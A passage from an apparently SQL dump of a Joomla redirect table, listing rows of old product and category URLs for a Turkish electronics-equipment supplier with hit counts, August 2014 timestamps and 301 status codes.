00:28:20','0000-00-00 00:00:00',301),(1605,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111&Itemid=122&lang=tr','','','',6,0,'2014-08-08 00:28:53','0000-00-00 00:00:00',301),(1606,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=tr','','','',4,0,'2014-08-08 00:29:17','0000-00-00 00:00:00',301),(1607,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=93&Itemid=104&lang=tr','','','',3,0,'2014-08-08 00:29:59','0000-00-00 00:00:00',301),(1608,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=tr','','','',1,0,'2014-08-08 00:32:41','0000-00-00 00:00:00',301),(1609,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=tr','','','',3,0,'2014-08-08 00:42:31','0000-00-00 00:00:00',301),(1610,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=125&Itemid=131&lang=tr','','','',1,0,'2014-08-08 00:45:32','0000-00-00 00:00:00',301),(1611,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=125&Itemid=131&lang=en','','','',1,0,'2014-08-08 00:46:15','0000-00-00 00:00:00',301),(1612,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=tr','','','',3,0,'2014-08-08 00:52:21','0000-00-00 00:00:00',301),(1613,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=en','','','',3,0,'2014-08-08 00:53:06','0000-00-00 00:00:00',301),(1614,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=tr','','','',4,0,'2014-08-08 00:58:32','0000-00-00 00:00:00',301),(1615,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=en','','','',4,0,'2014-08-08 01:00:33','0000-00-00 00:00:00',301),(1616,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=en','','','',5,0,'2014-08-08 01:02:29','0000-00-00 00:00:00',301),(1617,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=tr','','','',3,0,'2014-08-08 01:03:17','0000-00-00 00:00:00',301),(1618,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=en','','','',1,0,'2014-08-08 01:03:27','0000-00-00 00:00:00',301),(1619,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=83&Itemid=95&lang=tr','','','',1,0,'2014-08-08 01:07:23','0000-00-00 00:00:00',301),(1620,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58','','','',3,0,'2014-08-08 01:10:18','0000-00-00 00:00:00',301),(1621,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=127&Itemid=134&lang=en','','','',1,0,'2014-08-08 01:11:46','0000-00-00 00:00:00',301),(1622,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=127&Itemid=134&lang=tr','','','',1,0,'2014-08-08 01:12:16','0000-00-00 00:00:00',301),(1623,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87:temizlik&catid=40:temizleme&Itemid=103&lang=tr','','','',11,0,'2014-08-08 01:13:28','0000-00-00 00:00:00',301),(1624,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=tr','','','',1,0,'2014-08-08 01:15:14','0000-00-00 00:00:00',301),(1625,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=tr','','','',1,0,'2014-08-08 01:15:44','0000-00-00 00:00:00',301),(1626,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=0&lang=en','','','',1,0,'2014-08-08 01:17:06','0000-00-00 00:00:00',301),(1627,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=en','','','',3,0,'2014-08-08 01:17:46','0000-00-00 00:00:00',301),(1628,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=40&Itemid=60&lang=tr','','','',2,0,'2014-08-08 01:20:18','0000-00-00 00:00:00',301),(1629,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=en','','','',2,0,'2014-08-08 01:21:16','0000-00-00 00:00:00',301),(1630,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=149&Itemid=150&lang=en','','','',1,0,'2014-08-08 01:21:46','0000-00-00 00:00:00',301),(1631,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=149&Itemid=150&lang=tr','','','',2,0,'2014-08-08 01:23:42','0000-00-00 00:00:00',301),(1632,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=en','','','',1,0,'2014-08-08 01:25:12','0000-00-00 00:00:00',301),(1633,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=en','','','',1,0,'2014-08-08 01:28:41','0000-00-00 00:00:00',301),(1634,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=79&lang=tr','','','',4,0,'2014-08-08 01:29:39','0000-00-00 00:00:00',301),(1635,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=57&Itemid=145&lang=en','','','',1,0,'2014-08-08 01:38:55','0000-00-00 00:00:00',301),(1636,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=115&Itemid=126&lang=tr','','','',3,0,'2014-08-08 01:39:33','0000-00-00 00:00:00',301),(1637,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=154&Itemid=156&lang=tr','','','',1,0,'2014-08-08 01:39:34','0000-00-00 00:00:00',301),(1638,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=115&Itemid=126&lang=en','','','',1,0,'2014-08-08 01:40:04','0000-00-00 00:00:00',301),(1639,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=en','','','',2,0,'2014-08-08 01:40:05','0000-00-00 00:00:00',301),(1640,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=36&Itemid=37&lang=en','','','',2,0,'2014-08-08 01:40:36','0000-00-00 00:00:00',301),(1641,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61','','','',3,0,'2014-08-08 01:43:28','0000-00-00 00:00:00',301),(1642,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136&Itemid=138&lang=tr','','','',4,0,'2014-08-08 01:44:20','0000-00-00 00:00:00',301),(1643,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=tr','','','',3,0,'2014-08-08 01:44:44','0000-00-00 00:00:00',301),(1644,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=87&Itemid=103&lang=tr','','','',1,0,'2014-08-08 01:44:46','0000-00-00 00:00:00',301),(1645,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=en','','','',2,0,'2014-08-08 01:45:16','0000-00-00 00:00:00',301),(1646,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=94&Itemid=105','','','',4,0,'2014-08-08 01:51:19','0000-00-00 00:00:00',301),(1647,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=154&Itemid=156&lang=en','','','',5,0,'2014-08-08 01:51:47','0000-00-00 00:00:00',301),(1648,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=154&Itemid=156&lang=tr','','','',1,0,'2014-08-08 01:52:20','0000-00-00 00:00:00',301),(1649,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=57&Itemid=145&lang=en','','','',2,0,'2014-08-08 01:53:27','0000-00-00 00:00:00',301),(1650,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100&lang=en','','','',8,0,'2014-08-08 01:54:09','0000-00-00 00:00:00',301),(1651,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=tr','','','',3,0,'2014-08-08 01:57:10','0000-00-00 00:00:00',301),(1652,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=en','','','',3,0,'2014-08-08 01:59:17','0000-00-00 00:00:00',301),(1653,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=58&Itemid=149&lang=tr','','','',1,0,'2014-08-08 02:00:54','0000-00-00 00:00:00',301),(1654,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=58&Itemid=149&lang=en','','','',2,0,'2014-08-08 02:01:51','0000-00-00 00:00:00',301),(1655,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=87&Itemid=103&lang=tr','','','',2,0,'2014-08-08 02:05:01','0000-00-00 00:00:00',301),(1656,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=86&Itemid=98&lang=en','','','',1,0,'2014-08-08 02:05:46','0000-00-00 00:00:00',301),(1657,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=tr','','','',1,0,'2014-08-08 02:27:15','0000-00-00 00:00:00',301),(1658,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=72:av131&catid=42:th-dizgi&Itemid=78&lang=en','','','',12,0,'2014-08-08 02:28:34','0000-00-00 00:00:00',301),(1659,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=en','','','',1,0,'2014-08-08 02:28:34','0000-00-00 00:00:00',301),(1660,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=tr','','','',13,0,'2014-08-08 02:34:05','0000-00-00 00:00:00',301),(1661,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=en','','','',8,0,'2014-08-08 02:34:16','0000-00-00 00:00:00',301),(1662,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=tr','','','',5,0,'2014-08-08 02:34:31','0000-00-00 00:00:00',301),(1663,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=tr','','','',4,0,'2014-08-08 02:37:03','0000-00-00 00:00:00',301),(1664,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=en','','','',6,0,'2014-08-08 02:38:46','0000-00-00 00:00:00',301),(1665,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143&lang=tr','','','',4,0,'2014-08-08 02:43:17','0000-00-00 00:00:00',301),(1666,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150','','','',5,0,'2014-08-08 02:46:05','0000-00-00 00:00:00',301),(1667,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default','','','',5,0,'2014-08-08 02:52:36','0000-00-00 00:00:00',301),(1668,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=99&Itemid=43&lang=tr','','','',1,0,'2014-08-08 02:54:10','0000-00-00 00:00:00',301),(1669,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=99&Itemid=43&lang=en','','','',1,0,'2014-08-08 02:55:23','0000-00-00 00:00:00',301),(1670,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=&lang=tr','','','',1,0,'2014-08-08 02:57:47','0000-00-00 00:00:00',301),(1671,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=tr','','','',5,0,'2014-08-08 03:02:41','0000-00-00 00:00:00',301),(1672,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=en','','','',4,0,'2014-08-08 03:03:16','0000-00-00 00:00:00',301),(1673,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=tr','','','',4,0,'2014-08-08 03:10:20','0000-00-00 00:00:00',301),(1674,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&Itemid=151&lang=en','','','',3,0,'2014-08-08 03:14:57','0000-00-00 00:00:00',301),(1675,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr','','','',4,0,'2014-08-08 03:16:11','0000-00-00 00:00:00',301),(1676,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en','','','',21,0,'2014-08-08 03:17:49','0000-00-00 00:00:00',301),(1677,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=en','','','',1,0,'2014-08-08 03:18:32','0000-00-00 00:00:00',301),(1678,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=tr','','','',2,0,'2014-08-08 03:19:44','0000-00-00 00:00:00',301),(1679,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=157&Itemid=158&lang=en','','','',1,0,'2014-08-08 03:27:55','0000-00-00 00:00:00',301),(1680,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=115&Itemid=126&lang=tr','','','',12,0,'2014-08-08 03:27:55','0000-00-00 00:00:00',301),(1681,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=tr','','','',11,0,'2014-08-08 03:29:07','0000-00-00 00:00:00',301),(1682,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=115&Itemid=126&lang=tr','','','',13,0,'2014-08-08 03:29:07','0000-00-00 00:00:00',301),(1683,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=157&Itemid=158&lang=tr','','','',1,0,'2014-08-08 03:29:32','0000-00-00 00:00:00',301),(1684,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=145&Itemid=147&lang=en','','','',1,0,'2014-08-08 03:43:43','0000-00-00 00:00:00',301),(1685,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=en','','','',11,0,'2014-08-08 03:44:48','0000-00-00 00:00:00',301),(1686,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=en','','','',1,0,'2014-08-08 03:44:53','0000-00-00 00:00:00',301),(1687,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=tr','','','',3,0,'2014-08-08 03:45:11','0000-00-00 00:00:00',301),(1688,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110&Itemid=121&lang=tr','','','',3,0,'2014-08-08 03:46:16','0000-00-00 00:00:00',301),(1689,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=116&Itemid=127&lang=tr','','','',1,0,'2014-08-08 03:48:37','0000-00-00 00:00:00',301),(1690,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=88&Itemid=100&lang=tr','','','',1,0,'2014-08-08 03:48:38','0000-00-00 00:00:00',301),(1691,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=116&Itemid=127&lang=en','','','',1,0,'2014-08-08 03:49:24','0000-00-00 00:00:00',301),(1692,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=tr','','','',113,0,'2014-08-08 03:53:43','0000-00-00 00:00:00',301),(1693,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=en','','','',1,0,'2014-08-08 03:58:37','0000-00-00 00:00:00',301),(1694,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=tr','','','',1,0,'2014-08-08 03:58:42','0000-00-00 00:00:00',301),(1695,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&limitstart=5','','','',4,0,'2014-08-08 04:01:15','0000-00-00 00:00:00',301),(1696,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=82&Itemid=38&lang=en','','','',4,0,'2014-08-08 04:05:16','0000-00-00 00:00:00',301),(1697,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=167&Itemid=163&lang=tr','','','',3,0,'2014-08-08 04:06:21','0000-00-00 00:00:00',301),(1698,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=167&Itemid=163&lang=en','','','',3,0,'2014-08-08 04:07:27','0000-00-00 00:00:00',301),(1699,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=57%3Ascreen-printer&Itemid=145&layout=default&lang=tr','','','',2,0,'2014-08-08 04:12:16','0000-00-00 00:00:00',301),(1700,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125','','','',1,0,'2014-08-08 04:14:23','0000-00-00 00:00:00',301),(1701,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=109&Itemid=120&lang=tr','','','',1,0,'2014-08-08 04:15:00','0000-00-00 00:00:00',301),(1702,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=tr','','','',3,0,'2014-08-08 04:15:23','0000-00-00 00:00:00',301),(1703,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113&Itemid=125&lang=tr','','','',4,0,'2014-08-08 04:16:30','0000-00-00 00:00:00',301),(1704,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=97&lang=tr','','','',3,0,'2014-08-08 04:26:06','0000-00-00 00:00:00',301),(1705,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133','','','',7,0,'2014-08-08 04:33:21','0000-00-00 00:00:00',301),(1706,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=en','','','',4,0,'2014-08-08 04:34:31','0000-00-00 00:00:00',301),(1707,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114','','','',1,0,'2014-08-08 04:34:59','0000-00-00 00:00:00',301),(1708,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=tr','','','',2,0,'2014-08-08 04:38:16','0000-00-00 00:00:00',301),(1709,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=en','','','',2,0,'2014-08-08 04:38:36','0000-00-00 00:00:00',301),(1710,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=tr','','','',4,0,'2014-08-08 04:44:08','0000-00-00 00:00:00',301),(1711,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=en','','','',4,0,'2014-08-08 04:44:30','0000-00-00 00:00:00',301),(1712,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55&lang=en','','','',4,0,'2014-08-08 04:45:10','0000-00-00 00:00:00',301),(1713,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144&lang=en','','','',3,0,'2014-08-08 04:46:34','0000-00-00 00:00:00',301),(1714,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=83:neomark&catid=51:neo&Itemid=95&lang=tr','','','',1,0,'2014-08-08 05:10:25','0000-00-00 00:00:00',301),(1715,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37&lang=tr','','','',8,0,'2014-08-08 05:17:50','0000-00-00 00:00:00',301),(1716,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=en','','','',4,0,'2014-08-08 05:21:22','0000-00-00 00:00:00',301),(1717,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=en','','','',36,0,'2014-08-08 05:23:24','0000-00-00 00:00:00',301),(1718,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=121&Itemid=115&lang=en','','','',1,0,'2014-08-08 05:28:40','0000-00-00 00:00:00',301),(1719,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=121&Itemid=115&lang=tr','','','',1,0,'2014-08-08 05:29:35','0000-00-00 00:00:00',301),(1720,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=tr','','','',1,0,'2014-08-08 05:33:51','0000-00-00 00:00:00',301),(1721,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=87&lang=tr','','','',1,0,'2014-08-08 05:35:19','0000-00-00 00:00:00',301),(1722,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=tr','','','',3,0,'2014-08-08 05:37:15','0000-00-00 00:00:00',301),(1723,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=tr','','','',4,0,'2014-08-08 05:41:51','0000-00-00 00:00:00',301),(1724,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=151&Itemid=152&lang=en','','','',2,0,'2014-08-08 05:43:55','0000-00-00 00:00:00',301),(1725,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=151&Itemid=152&lang=tr','','','',1,0,'2014-08-08 05:46:33','0000-00-00 00:00:00',301),(1726,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58&lang=en','','','',4,0,'2014-08-08 05:47:31','0000-00-00 00:00:00',301),(1727,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=en','','','',1,0,'2014-08-08 05:49:03','0000-00-00 00:00:00',301),(1728,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=tr','','','',2,0,'2014-08-08 05:49:24','0000-00-00 00:00:00',301),(1729,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=88&Itemid=100&lang=en','','','',20,0,'2014-08-08 05:55:21','0000-00-00 00:00:00',301),(1730,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=tr','','','',4,0,'2014-08-08 05:58:02','0000-00-00 00:00:00',301),(1731,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=119&Itemid=117&lang=en','','','',4,0,'2014-08-08 05:58:54','0000-00-00 00:00:00',301),(1732,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=119&Itemid=117&lang=tr','','','',2,0,'2014-08-08 05:59:49','0000-00-00 00:00:00',301),(1733,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=tr','','','',1,0,'2014-08-08 06:01:28','0000-00-00 00:00:00',301),(1734,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=en','','','',4,0,'2014-08-08 06:02:17','0000-00-00 00:00:00',301),(1735,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=166&Itemid=144&lang=en','','','',15,0,'2014-08-08 06:07:21','0000-00-00 00:00:00',301),(1736,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=160&Itemid=161&lang=en','','','',1,0,'2014-08-08 06:15:45','0000-00-00 00:00:00',301),(1737,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=160&Itemid=161&lang=tr','','','',3,0,'2014-08-08 06:17:20','0000-00-00 00:00:00',301),(1738,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=tr','','','',4,0,'2014-08-08 06:17:27','0000-00-00 00:00:00',301),(1739,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=&lang=en','','','',1,0,'2014-08-08 06:18:44','0000-00-00 00:00:00',301),(1740,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=158&Itemid=159&lang=tr','','','',1,0,'2014-08-08 06:22:41','0000-00-00 00:00:00',301),(1741,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=158&Itemid=159&lang=en','','','',1,0,'2014-08-08 06:22:48','0000-00-00 